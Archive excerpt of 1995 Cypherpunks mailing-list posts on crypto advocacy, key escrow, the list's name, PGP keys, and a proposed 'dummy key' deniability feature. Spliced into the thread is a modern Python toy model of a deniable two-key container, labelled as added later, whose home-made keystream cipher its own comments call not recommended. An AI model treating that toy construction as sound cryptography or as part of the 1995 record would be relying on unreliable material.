preventing crime is probably the best approach we have to getting the meme
into the mainstream's ear that "I need good crypto".

- --------------------------------------------------------------

Towards this goal, I have written a short Q&A that could be used as a
model when discussing cryptography with non-cypherpunks. These are
UNFINISHED DRAFTS. I would welcome additions, corrections, completions, and
modifications. Please do NOT repost to other locations until they are
finished. I'm trying to avoid wild anti-state tirades, giving mainstream
reasons for people to take pro-cryptography positions.

- -------------------------------------------------------------

Q: Why should I use cryptography?

A: To protect yourself against crime. Criminals have already been caught
installing "sniffers" on the Internet, and capturing passwords and other
data. Cryptography will protect you from this. It will also protect your
company against industrial espionage, and reduce fraud by providing
unforgeable and undeniable digital signatures. Cell phone companies
currently pay $XXXX million every year due to cellular fraud.
This vast level of crime could be reduced to near zero by cryptography,
with a corresponding reduction in cellular rates. On top of this, a great
deal of crime is committed by tapping cell phone conversations - something
that can be done by any teenager (or gangster) with a simple scanner. Even
the British royal family have had their privacy invaded by this method.
Encryption can protect your phone conversations, and make them as private
as regular phones. Finally, strong encryption can make the Internet safe
for commerce and trade.

[We need more data on the 'sniffer' attacks which have occurred - I know
there was one on BARRNET about a year ago, and I understand that there have
been others].

Q: Won't criminals be able to evade wiretaps by encryption?

A: In theory they could. However, the FBI has not reported a single case
where cryptography has been a barrier to wiretaps [I think this is correct
- any counters?]. It turns out that criminals have not been using strong
cryptography. Even if they did start to do so, audio and data bugs can
still be planted. Criminals *have* been tapping the unencrypted data that
flows through and is stored on the Internet, and tapping cell phone
transmissions to commit cellular fraud. Encrypting your data and
communications will help protect you against them.

Q: Aren't LEAs worried that strong encryption will make it more difficult
for them to catch crooks?

A: There's an old saying that's apropos here: "When you're up to your ass
in alligators, it's easy to forget that you're trying to drain the swamp."
The reason we have LEAs is not to catch crooks; their purpose is to
prevent crime. Catching crooks is simply one method of doing so.
Cryptography provides a method of preventing crime before it happens, and
putting the crooks out of business. To give a couple of analogies:

1. If your house was strongly built, and no one could enter without your
   consent, you would not worry about burglary.
If every house was similarly robust, burglars would be out of a job. 2. Similarly, if your car could not be broken into, damaged, or moved in any way without your cooperation, you would not worry about car theft, or pay for theft insurance. If all cars were similarly protected, car theft and carjacking would no longer exist as crimes. LEAs tend to focus on the small number of investigations which may be hampered by good cryptography, ignoring the vast number of crimes which would be prevented by the same technology. This is a classic example of failing to see the forest for the trees. The widespread use of cryptography would reduce crime to a point where many LEA employees could retire. Q: What's this 'key escrow' thing? A: Some government agencies have been trying to figure out methods which simultaneously permit US citizens to use strong cryptography against criminal eavesdroppers, while retaining the ease with which LEAs can currently tap your calls. The schemes generally involve something mistitled 'key escrow', in which copies of cryptographic keys would be stored at sites accessible by LEAs. Q: Why do you object to it? A: This is a bit as if your local police department ordered you to send them copies of all of your house, car, and office keys, so that they could enter whenever they felt it warranted, without your knowledge. Even assuming no keys will be leaked to criminals from such a valuable archive, it's an incredible boondoggle. The initial cost is tens of millions of dollars per year, by the most conservative government estimates. In reality, it's likely to be hundreds of millions a year, all to enable LEAs to investigate a type of crime which does not yet occur, and may never occur. Q: But isn't escrow required only for export [like I said, I haven't finished] - ------------------------------------------------------ Cute signature quotes are needed. example: I lock my house. Don't you? I lock my car. Don't you? I lock my data. Do you?
Use cryptography to protect yourself against crime. - ------------------------------------------------------ Up to this point, I've been an advocate of crypto without using it for much of anything - a classical case of 'I don't have anything that needs it'. I'm going to start clearsigning my messages with PGP. My new key is is included here, and has been put on the MIT server. No signatures yet (sorry I didn't get together with Perry in Danvers). Here's my key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzBST7QAAAEEAMs3b6h0lmwbELWbwoVwBVTInb3Gt0YWSamxbC/DJZ4YHqCh 2+aFZKGGlRfoaAeUeus/Vf0oLffwBMmXspSp86P1Nbk/jlR3TdwTqZA4BpcsylF9 68hJYQjrqQRoibXNyNc6O6/yyqm0MUkE1zcZAM3mW0dGV4d5+1QxhKXe9s8VAAUR tB1QZXRlciBHLiBUcmVpIDxwdHJlaUBhY20ub3JnPokAlQMFEDBSUEJUMYSl3vbP FQEB9Z4D/i2vJclQg4iCnHq1H02DR7az533GoRlxWIjOXd/Y1HrxSyFWcA6zTRM1 8FVFPJw4vL0qbynyCXKKTSmN4kzfSSN/Tt60UKy7i3DWZIL6J0kQIbNUxt6mMB76 4Qk3yFWebf14hg7w3e42Hngf6Nw0ZGjLdLieSlixFgg3CAFXmWVa =DsOh - -----END PGP PUBLIC KEY BLOCK----- KeyId = DEF6CF15 Key fingerprint = 07 4A 45 4E 09 F8 30 1F 78 97 AD 18 24 4E 19 E3 I'm signing this with 'pgp -sta' on a Windoze NT machine. Could someone check the sig and tell me if it computes? Thanks, Peter Trei - ------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFXLXFQxhKXe9s8VAQEhewP9GFus8GXNygG3rjQqrx1uIW6Cb2QxtMZG igKwDaSZQpp3a9Q8oQfSCbK6da6TotOOSZhI9EYG6Es31eoDhyomn2HR/Bompocl hmkQgMqasJW37Rs1/Vw4uBfdoq0o0FiC8jLkvSj7j+pDP6FB890pWzTtEJ+t+Hqd au6NALhGo14= =jTar -----END PGP SIGNATURE----- gah - pgp has munged the dashed lines for the pubkey. 
Here it is again: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzBST7QAAAEEAMs3b6h0lmwbELWbwoVwBVTInb3Gt0YWSamxbC/DJZ4YHqCh 2+aFZKGGlRfoaAeUeus/Vf0oLffwBMmXspSp86P1Nbk/jlR3TdwTqZA4BpcsylF9 68hJYQjrqQRoibXNyNc6O6/yyqm0MUkE1zcZAM3mW0dGV4d5+1QxhKXe9s8VAAUR tB1QZXRlciBHLiBUcmVpIDxwdHJlaUBhY20ub3JnPokAlQMFEDBSUEJUMYSl3vbP FQEB9Z4D/i2vJclQg4iCnHq1H02DR7az533GoRlxWIjOXd/Y1HrxSyFWcA6zTRM1 8FVFPJw4vL0qbynyCXKKTSmN4kzfSSN/Tt60UKy7i3DWZIL6J0kQIbNUxt6mMB76 4Qk3yFWebf14hg7w3e42Hngf6Nw0ZGjLdLieSlixFgg3CAFXmWVa =DsOh -----END PGP PUBLIC KEY BLOCK----- Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From hfinney at shell.portal.com Wed Sep 13 07:35:26 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 13 Sep 95 07:35:26 PDT Subject: GAK/weak crypto rationale? Message-ID: <199509131434.HAA09918@jobe.shell.portal.com> Responding to msg by futplex at pseudonym.com (Futplex) on Wed, 13 Sep 2:11 AM >Your paraphrase of Nelson's statement strikes me as >remarkable. Doesn't "we are not concerned with bad >people using crypto among themselves" run completely >counter to all the hyperbole about terrorists planning >OKC II with PGP ? Does anyone have an exact quotation >? At any rate, sign me up as a "bad person".... I think this is setting up the rationale for software key escrow. One of the big loopholes in this idea has always been that it would be easy for bad guys to superencrypt or otherwise bypass the legal encryption. The response has been that the systems will be designed so that compliant systems will not interoperate with rogue systems. And the counter-response to that was that criminals (and privacy advocates) would use software which would operate compliantly with conventional programs and maintain privacy when talking to other rogue programs. This new line will be used to respond to this argument, I think. 
Even if it is admitted that there is no way for the government to be able to tell what the criminals say amongst themselves, it will still be useful to be able to tell what they say to other people. Therefore software key escrow will be argued to still be useful even though it can be defeated. Hal From hfarkas at ims.advantis.com Wed Sep 13 07:46:06 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Wed, 13 Sep 95 07:46:06 PDT Subject: Scientology tries to break PGP - and In-Reply-To: <199509131332.JAA29256@detroit.freenet.org> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 13 Sep 1995, David R. Conrad wrote: > And the idea is that on decrypting with the 'wrong' key, it outputs the > dummy file rather than the real plaintext, correct? I'll say it again. :-) PGP could allow for an alternate secret key and a standard "dummy" document from somewhere in your path. A command line option would encrypt for both keys (as if there were 2 recipients) and append the "dummy" document to the end of the target file when encrypting. If decrypted with the "alternate" or "fake" secret key, the encrypted file is wiped until it reaches a marker; the remainder of the file is displayed. If you use your "primary" or "real key", the extraneous text is simply stripped. Alternately, the "dummy" file could overwrite the "real" message n times, to keep the decrypted file size more realistic. > Why would they use your copy of the program to decrypt the file? They > could just use a version that lacked this 'feature'. A good point. A new version of pgp would have to be incompatible with older versions. That's a Very Big Hassle, I know. But consider the advantage. Nobody who has your secure key can prove that it's not the "real" secure key and that the decrypted file is not the real plaintext. They may "know" it but they can't prove it. All they can do is force you to hand over *-a-* key that will decrypt the file. 
> Of course, they > still couldn't get at the real plaintext unless you gave them the key, > but you are right back to the same old standoff where they say, "Give > us your key," and you (try to) say, "No." Well yes, that is the point I'm trying to address. The key you finally give them *is* your secure key. Just not the key under the blender. They will have a hard time arguing "But that's not what the file *really* said and, deep inside of me, I know it!". I say again: All they can do is force you to hand over *-a-* key that will decrypt the file. "You cannot force a mind." - J. Galt - =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMFbufqDthkLkvrK9AQEl/AP+I++gw4+zs3TBMbmLZTrydX+EQ/eJ0mX2 IxldmyS7raU1y2jGo+K3M3NYYQMmY0D9+HGKpvJef4p8GRQ6/R4beMAqsOUNgN+h fgIt9Szf7+gVdmJas8Nu5RmFEV9l4pieoSvHfQuQnMl++BEPJ7/13vG+E22Bf5bs tbxy1VZX4QI= =itux -----END PGP SIGNATURE----- From jya at pipeline.com Wed Sep 13 07:48:17 1995 From: jya at pipeline.com (John Young) Date: Wed, 13 Sep 95 07:48:17 PDT Subject: FUZ_fat Message-ID: <199509131448.KAA18880@pipe5.nyc.pipeline.com> 9-13-95. 
W$Japer: "Software May Dry Up Money Laundering." Can artificial intelligence be used to combat crime by ferreting out money laundering? Officials at law enforcement, defense and intelligence agencies like to think so. They have suggested creating a sophisticated computer program to screen records of the more than 700,000 electronic money transfers involving U.S. institutions each day and to flag suspicious ones for further investigation. By using AI, they hope to stop some of the $300 billion in profits from drug deals and other illegal activities that they estimate is laundered world-wide each year. But in a report issued yesterday, the congressional Office of Technology Assessment says any such plan would face considerable obstacles. [Cyberian Joel Reidenberg, an OTA advisor, is quoted.] FUZ_fat

From m5 at dev.tivoli.com Wed Sep 13 07:57:34 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 13 Sep 95 07:57:34 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <9509131434.AA23717@toad.com> Message-ID: <9509131453.AA31340@alpha>

Some comments (and note that I've just cleaned my white board, so I may not be thinking too rationally): Peter Trei writes:

> "Strong cryptography is a powerful new technology, of which the
> widespread and unfettered use should be encouraged."
>
> Our error lies in our approach to encouraging the widespread use of
> crypto. It is an error of hubris - overweening pride.

Hmm... I don't think I completely agree with this; on the contrary, the "senior members" of the list seem generally quite open and understanding of the issues re cryptography for the general public.

> We too often think of ourselves as an elite - smarter and better in
                                                                  ^^ [ careful here... ]
> various ways to our non-cpunk neighbours. We refer to these others as
> 'Joe Sixpack" and other such derogatory terms.
>
> The problem is that in doing so we are marginalizing ourselves.
>
> We call ourselves 'cypherpunks'.
> While this is derived from the SF
> term 'cyberpunk', consider the image we are creating for ourselves:
>
> A 'punk' is a marginalized young adult, one who rejects the norms
> of his or her society, and takes delight in irking those around him with
> his or her rejection. The older of us will think of James Dean in 'Rebel
> Without a Cause', or Brando in 'The Wild One'. Later, you get images
> such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
> other icons of the 'punk rock' movement.

I actually consider this a feature. With a "straight" name for the organization, like "International Cryptographic Interest Society" or something, we run the risk of being co-opted into the "mainstream" without even realizing it. There's nothing wrong with being a punk, remember. That the word is weighted simply means that people have to overcome prejudice. Indeed, much of the motivation for boosting cryptography is to protect the rights of every individual to opt out of conformity. If everyone were normal & mainstream, who'd care about hiding anything? What's to protect?

> These punks are often romantic figures, but in reality they started
> marginalized, remained marginalized, and died marginalized. They were
> ineffective in changing the core values of the society ...

Whoooa there; can you really say that? Can you really say that as society absorbs marginalized fragments of the culture that there's not a significant adjustment? In 1955, if I walked down the street with tousled hair, a white t-shirt covered by a ratty leather jacket, and messy jeans, I'd be an "obvious" criminal delinquent; now, I'd be in a Calvin Klein ad. There's certainly a profound effect on culture wrought by the mere existence of fringe groups, particularly if the groups can gain access to media.
> We, the 'cypherpunks' have embraced this label, taking pride in our > technical abilities, and acting as if we can institute 'cryptoanarchy' > without getting a majority of the population to support us. I think again that this is a generalization over the membership. Some do feel that way, and some don't; I think what you said above about the uniting factor of wanting to see cryptography popularized is accurate, and that's the theme that binds us together (if anything does). > This is a bad approach. The overwhelming majority of the US > population is not alienated from the US government, and regards with > suspicion those who are. I wonder about that assertion. > I suggest that we drop the term 'cypherpunk' - it has the wrong > connotations to get our ideas into the mainstream. I don't have a > perfect replacement yet: > > 1. I want to get away from the strings 'crypt' and c[iy]pher- they sound > too cloak-and-dagger. That idea seems pretty much a fundamental one to be attacked in any effort to popularize cryptography. > 2. It should imply that the labelees are level-headed, responsible > citizens, not longhaired weirdos. Again, I think that making a strong statement every time the name of the organization has to be read aloud by a newscaster is a feature. > 3. It should make itself difficult to invert - the classic example > is the pro-choice/pro-life dichotomy, where each side refuses to > acknowledge the other's terminology. Is "cypherpunk" invertible? > 4. A cute and apropos acronym would help. ... Sorry, I have to quit now; I need to borrow a fan before the fumes knock me out. In summary, I think your concerns are valid, but I'd hesitate to do something radical like change the list name. 
After all, think of all the mail filter files that'd have to be fixed :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From patrick at Verity.COM Wed Sep 13 08:01:18 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 13 Sep 95 08:01:18 PDT Subject: Digital Fingerprinting Message-ID: <9509131457.AA17323@cantina.verity.com>

> > > Then, in W.Ky., as in Stockbridge, "You can get
> > anything you want..."? :)
>
> I'd stick with:
> ***********************************************
> You can't always get what you want 1
> but if you try
> sometimes, sometimes you get what you need. 2
> ***********************************************
>
> 1 ability to dump garbage where you want
> 2 a better appreciation for the environment
> :-)

Why do I feel like I'm sitting on the group W bench? Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;). \
| (\ |
| Patrick J. Horgan Verity Inc. \\ Have |
| patrick at verity.com 1550 Plymouth Street \\ _ Sword |
| Phone : (415)960-7600 Mountain View \\/ Will |
| FAX : (415)960-7750 California 94303 _/\\ Travel |
\___________________________________________________________\)__________/

From rsalz at osf.org Wed Sep 13 08:01:54 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 13 Sep 95 08:01:54 PDT Subject: Recent articles Message-ID: <9509131501.AA04394@sulphur.osf.org>

Jon Bentley's column in this month's Unix Review talks about protecting data. As with all his columns, it's short but manages to touch on a large number of issues; in this case, using page faults to guess passwords, threat models, and so on.
Upside, "The Business Magazine for the Technology Elite" (http://www.upside.com) has an interview with Jim Clark that took place two weeks before the IPO. He discusses in a couple of places how using crypto over the Internet is critical for businesses that can't afford private nets, and how this is an important part of their business plan. (Prof Froomkin: Upside also has an article on "IETF infighting" you might want to read.) /r$

From hallam at w3.org Wed Sep 13 08:19:14 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 13 Sep 95 08:19:14 PDT Subject: Whitehouse "dissident" and net monitoring In-Reply-To: <199509131202.AA15294@personal.eunet.fi> Message-ID: <9509131518.AA22994@zorch.w3.org>

>> >(4) Is the April 9 statement by David Lytel of the White House Office of
>> > Science and Technology to Amy Bauer of Copley News Service that the
>> > administration does not monitor anti-Clinton activity on the web still
>> > operative?

>Probably they do and they really should. If I was Mr. Clinton (which
>I luckily am not) I would want my adjutants to prepare a report for
>me each morning summing up all the possible comments round
>subject Clinton and The USA from NET: That would be very precious
>source of feedback to fine-tune your acts. And that information
>is real time.

Nope, they don't; the Democratic party aides do that type of work from Democrat HQ. The President gets a once-a-week summary of all the mail he gets, including the email. I think they also provide a daily press digest. By monitoring, Lytel was probably thinking about installing net sniffers etc. or obtaining the data from the FBI or whoever. I am certain he didn't mean to say that he does not surf the net ever and does not occasionally visit opposition sites. The term monitor implies an organised search and continuous checking procedure. The number of hits cited sounds more like someone passed round the URL of a kook site inside the office.
Phill

From patrick at Verity.COM Wed Sep 13 08:42:57 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 13 Sep 95 08:42:57 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <9509131539.AA17341@cantina.verity.com>

> > Sure. I'll respect their privacy as much as they, and the
> organizations they oversee, respect mine. I'll use as the
> representative organizations the IRS and the Social Security
> Administration, which respects my privacy so much that they use
> prison inmates to process paperwork.
>
> If I was in a nasty mood, I'd add the USPS.
>
> Sarcasm aside, they show no interest in other people's
> privacy. Why should we go out of our way to do anything but show them
> how bad the situation is?
>
> Adam

Oh please! Some clerk browses the Internet and you don't want to respect their privacy because of the IRS? This makes sense how? I suppose that you're going to dig up information about me and spread it around the Internet because you have issues about the company I work for? Suppose someone did something bad to you and justified it by saying that Harvard is an elitist school that once did something bad to their uncle. Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;). \
| (\ |
| Patrick J. Horgan Verity Inc. \\ Have |
| patrick at verity.com 1550 Plymouth Street \\ _ Sword |
| Phone : (415)960-7600 Mountain View \\/ Will |
| FAX : (415)960-7750 California 94303 _/\\ Travel |
\___________________________________________________________\)__________/

From asb at nexor.co.uk Wed Sep 13 08:50:17 1995 From: asb at nexor.co.uk (Andy Brown) Date: Wed, 13 Sep 95 08:50:17 PDT Subject: Scientology tries to break PGP - and In-Reply-To: Message-ID:

On Wed, 13 Sep 1995, Henry W. Farkas wrote:

> If decrypted with the "alternate" or "fake" secret key, the encrypted file
> is wiped until it reaches a marker; the remainder of the file is
> displayed.
If you use your "primary" or "real key", the extraneous text > is simply stripped. Useless I'm afraid. They have the source code and have disabled your "feature" and attached loud alarm bells to it. - Andy From frissell at panix.com Wed Sep 13 08:51:21 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 13 Sep 95 08:51:21 PDT Subject: Software vs Money Laundering Message-ID: <199509131549.LAA22502@panix.com> At 10:48 AM 9/13/95 -0400, John Young wrote: > Can artificial intelligence be used to combat crime by > ferreting out money laundering? Officials at law > enforcement, defense and intelligence agencies like to > think so. They have suggested creating a sophisticated > computer program to screen records of the more than > 700,000 electronic money transfers involving U.S. > institutions each day and to flag suspicious ones for > further investigation. By using AI, they hope to stop > some of the $300 billion in profits from drug deals and > other illegal activities that they estimate is laundered > world-wide each year. But in a report issued yesterday, > the congressional Office of Technology Assessment says > any such plan would face considerable obstacles. > [Cyberian Joel Reidenberg, an OTA advisor, is quoted.] > Not the least of which is that money launderers can use "AI Software" to generate a stream of real and dummy money transfers that emulates "normal" money transfers. Not to mention the fact that monopoly money transfer networks that can be surveilled by the Feds (FEDWIRE and SWIFT) are not long for this world. They will be replaced by encrypted, open, net-based systems. DCF "Yes Virginia, one *can* have an encrypted, open system. In fact, that's the best way to have an open system." 
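The two-key scheme Farkas sketches above (encrypt for both keys as if there were two recipients, and show the dummy when the duress key is supplied) and Brown's objection to it (the adversary has the source code and simply disables the feature) can be put side by side in a small Python model. This is an added example written for this page; it is not code from the thread, from PGP 2.6.2, or from any proposal in it. It uses only the standard library: each slot is keyed from its own passphrase with PBKDF2 and sealed with an HMAC-SHA256 keystream plus authentication tag, stand-ins chosen so the example is self-contained, not a recommended cipher. `honest_decrypt` is the proposed client, returning whatever the supplied key opens and nothing else; `forensic_decrypt` is Brown's modified client, which reports every slot, including the one that stays sealed. The passphrases, sample texts and the 100,000-iteration KDF parameter are made up for the demonstration.

```python
"""Toy two-slot 'deniable' container: one sealed slot per key.  The honest
client shows what the given key opens; a modified client shows every slot.

Added illustration only: not PGP code and not a recommended construction.
HMAC-SHA256-as-keystream and PBKDF2 are stand-ins chosen so this runs on the
Python standard library alone."""
import hashlib
import hmac
import os
import struct

SALT_LEN = NONCE_LEN = 16
TAG_LEN = 32
KDF_ITERATIONS = 100_000   # illustrative parameter, not a recommendation


def _keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR `data` with HMAC-SHA256(key, nonce || counter) blocks; symmetric."""
    out = bytearray()
    for block_no, offset in enumerate(range(0, len(data), 32)):
        block = hmac.new(key, nonce + struct.pack(">I", block_no), hashlib.sha256).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], block))
    return bytes(out)


def _slot_keys(passphrase: str, salt: bytes) -> tuple[bytes, bytes]:
    """Derive independent encryption and MAC keys for one slot."""
    material = hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, KDF_ITERATIONS, dklen=64)
    return material[:32], material[32:]


def seal_slot(passphrase: str, plaintext: bytes, rng=os.urandom) -> bytes:
    """salt || nonce || ciphertext || tag, openable only with `passphrase`."""
    salt, nonce = rng(SALT_LEN), rng(NONCE_LEN)
    enc_key, mac_key = _slot_keys(passphrase, salt)
    ciphertext = _keystream_xor(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    return salt + nonce + ciphertext + tag


def open_slot(passphrase: str, blob: bytes):
    """Plaintext if `passphrase` authenticates this slot, else None."""
    salt, nonce = blob[:SALT_LEN], blob[SALT_LEN:SALT_LEN + NONCE_LEN]
    ciphertext, tag = blob[SALT_LEN + NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    enc_key, mac_key = _slot_keys(passphrase, salt)
    expected = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return _keystream_xor(enc_key, nonce, ciphertext)


def pack_container(slots: list[bytes]) -> bytes:
    """Length-prefixed slots; the slot count is readable by anyone holding the file."""
    return b"".join(struct.pack(">I", len(s)) + s for s in slots)


def unpack_container(container: bytes) -> list[bytes]:
    slots, pos = [], 0
    while pos < len(container):
        (length,) = struct.unpack(">I", container[pos:pos + 4])
        pos += 4
        slots.append(container[pos:pos + length])
        pos += length
    return slots


def make_deniable(real_passphrase: str, real_text: bytes,
                  dummy_passphrase: str, dummy_text: bytes) -> bytes:
    """Encrypt 'for both keys (as if there were 2 recipients)', per the proposal."""
    return pack_container([seal_slot(real_passphrase, real_text),
                           seal_slot(dummy_passphrase, dummy_text)])


def honest_decrypt(passphrase: str, container: bytes):
    """The proposed client: return what this key opens, say nothing about the rest."""
    for blob in unpack_container(container):
        plaintext = open_slot(passphrase, blob)
        if plaintext is not None:
            return plaintext
    return None


def forensic_decrypt(passphrase: str, container: bytes) -> list[tuple[int, str]]:
    """Brown's adversary with the source: report the state of every slot."""
    report = []
    for index, blob in enumerate(unpack_container(container)):
        opened = open_slot(passphrase, blob) is not None
        report.append((index, "opened" if opened else "still sealed"))
    return report


if __name__ == "__main__":
    # Constructed sample data for the demonstration.
    box = make_deniable("key under the blender", b"meet at the usual place, bring the disks",
                        "the key I hand over", b"milk, eggs, bread")
    print(honest_decrypt("the key I hand over", box))     # only the grocery list
    print(forensic_decrypt("the key I hand over", box))   # one opened, one still sealed
```

With the duress key, `honest_decrypt` returns only the grocery list, while `forensic_decrypt` reports one slot opened and one still sealed: the container format, not the decryptor, is what reveals that a second message exists, and the holder can then be asked for a key to each slot in turn. PGP's own multiple-recipient messages carry one encrypted session-key packet per recipient ahead of the data, so the same observation applies there.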
From frissell at panix.com Wed Sep 13 08:57:53 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 13 Sep 95 08:57:53 PDT Subject: Web Proxy Servers Message-ID: <199509131531.LAA18512@panix.com>

At 10:26 PM 9/12/95 -0400, hallam at w3.org wrote:

>If they ever want an anonymous proxy server they are welcome to use ours.

So where's a pointer to it? Others might be interested. Even willing to pay. DCF

From dcl at panix.com Wed Sep 13 09:10:59 1995 From: dcl at panix.com (David C. Lambert) Date: Wed, 13 Sep 95 09:10:59 PDT Subject: An opportunity not to be missed Message-ID: <199509131610.MAA26686@panix.com>

-----BEGIN PGP SIGNED MESSAGE-----

It has occurred to me with the approach of the presidential campaign in the US (and its attendant press frenzy), that there is an unprecedentedly vast opportunity to bring certain items on the cypherpunk platform into the public spotlight. There are two planks of this platform that I believe: 1. would benefit from this exposure; 2. would be relatively easy to inoculate among the press and/or the candidates (actually, inoculation of the candidates, with subsequent propagation by the rabid campaign press). The first of these has to do with net.censorship, and formal recognition under law of ISPs' common carrier status. The second concerns remailers. I'll deal with each in turn. I believe that, given the hunger of the candidates for as much exposure as possible, one of them might be persuaded to take a part in the Scientology fracas. (This would have to happen fairly soon, since it looks like the Church is losing some major battles lately - the brand new news from Denver re: FACTnet and the ruling in VA concerning Arnie Lerma and the Washington Post). The desirable features of such a candidate might include: a certain amount of current power, marginal current press exposure, fairly deep-pocketed financing, an anti-regulatory stance, and a smidgeon of net awareness.
It should be fairly straightforward to convince such a candidate that: 1. there would be a tremendous increase in exposure due to the songs of praise from netizens (whose influence is most likely to be overly discounted by campaign strategists, IMHO, at this point in time), and from the mainstream press (especially Time magazine and the Washington Post, for obvious reasons). 2. that the exposure would be worth the peril of inviting the wrath of the Church. The payback of the press coverage of such a candidate would be infection of John Q. Public with the idea that ISPs are no more responsible for content of carried messages than the phone company, and an anti-censorship stance that does not make him (John Q.) pro-porn. This last is a huge flaw in the current battle for free speech on the net, IMO. (Thank you Marty Rimm.) If this issue could be refocused, I think that John Q. (and Jane) would find it much easier to support. The second plank that could be potentially advanced is anonymity. Anonymous remailers in particular, but the benefits of anonymity to users of the Net in general as well. I propose that we get some likely candidate (actually, a similar candidate to the one above) to advocate the benefits of anonymity on the net. The "spin" that would have to be used would depend on the particular candidate, but let's say, for example, we have:

Candidate Posturing             Required Spin
-----------------------------------------------------------------
Pro-business, tough on crime    anonymous crime tip e-mail a la Fed
                                whistleblower stuff, and the SPA
Pro-choice, women's vote        anonymous support services

Of course, there are many more examples, but we'd have to see which postures this campaign's candidates are going to pick.
Of course, I am somewhat cynical in my advocation of the particular "Required Spins" (the SPA support, especially), but I feel that the threats to privacy and public use of strong encryption (which walks hand in hand with the use of the remailers, naturally) are worth the potential risk on other fronts (the burgeoning software patent silliness, eg). You may ask why these candidates would be interested in this type of thing, and my response is that they can be forced. The religious right has no problem bringing their agenda into the public spotlight and forcing their issues onto candidates because of their willingness to use hyperbole and fanaticism (not to mention pressure on advertisers and other sponsors). I believe that netizens in general, and cypherpunks in particular can bring similar, and more reasoned, pressure to bear. I think that our job is easier than the religious right because it should be trivial to enlist the support of the mainstream press on these issues, and to direct the anti-federal ire that has been building in the US. In addition, Democratic candidates that are currently in office would love to have some way of attacking the Republican plans for this session of Congress. An attack on net.censorship via the CDA and the telecomm bill could be seen as the ideal place to attack the Republican agenda, and thereby the success of Republican candidates in the presidential race. Let the flames begin. - - David C. 
Lambert dcl at panix.com (finger for public key) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFcB+qpplsfgM88VAQFdewP9G0aHVTweUeCMa7J7Xhtu2R4cID6yP/J3 7WS5OicRWfl/hPRXj1Db74A9tDrkStEfobbL/2H6CsO9N4wZNgcDLQAa5MjX8ujf 0EF6v57nlcANb1qLJ5kmwfGj96PUMDtw00409tin3KssRAL0uz/lL9SWP/Mhj9q5 emZHYW3VC3c= =bTsO -----END PGP SIGNATURE----- From anonymous at freezone.remailer Wed Sep 13 09:11:42 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Wed, 13 Sep 95 09:11:42 PDT Subject: Dirty Pix Ad Message-ID: <199509131611.MAA28295@light.lightlink.com> Financial Times, Sept 13, 1995. Scientist urges action on Internet pornography By Clive Cookson Pornography accounts for about half of non-academic use of the Internet, the global computer network, the British Association science conference heard yesterday. Prof Harold Thimbleby, professor of computing research at Middlesex University, said most parents, politicians and educators had no idea how easy it was to find graphic descriptions of horrific perversions, through any personal computer linked to the net. "If you want to know about any perversion, you can find full details," Prof Thimbleby said, "and they are described in deceitful and evil ways." He was particularly upset by Internet porn sites that masquerade as victim support groups, such as those for child abuse that tell paedophiles how to entrap children. "I have found text, film and sound material that I find extremely disturbing, for example instructions for killing minors for sexual gratification." Prof Thimbleby has been researching the pattern of traffic on the Internet since the beginning of the year. It is impossible to monitor how more than a tiny fraction of the estimated 30m to 40m users utilise the net. But Prof Thimbleby analysed a representative sample of "bulletin boards" and of searches made via so-called "web crawlers" which act like telephone directories for the World Wide Web, the fastest growing part of the Internet. 
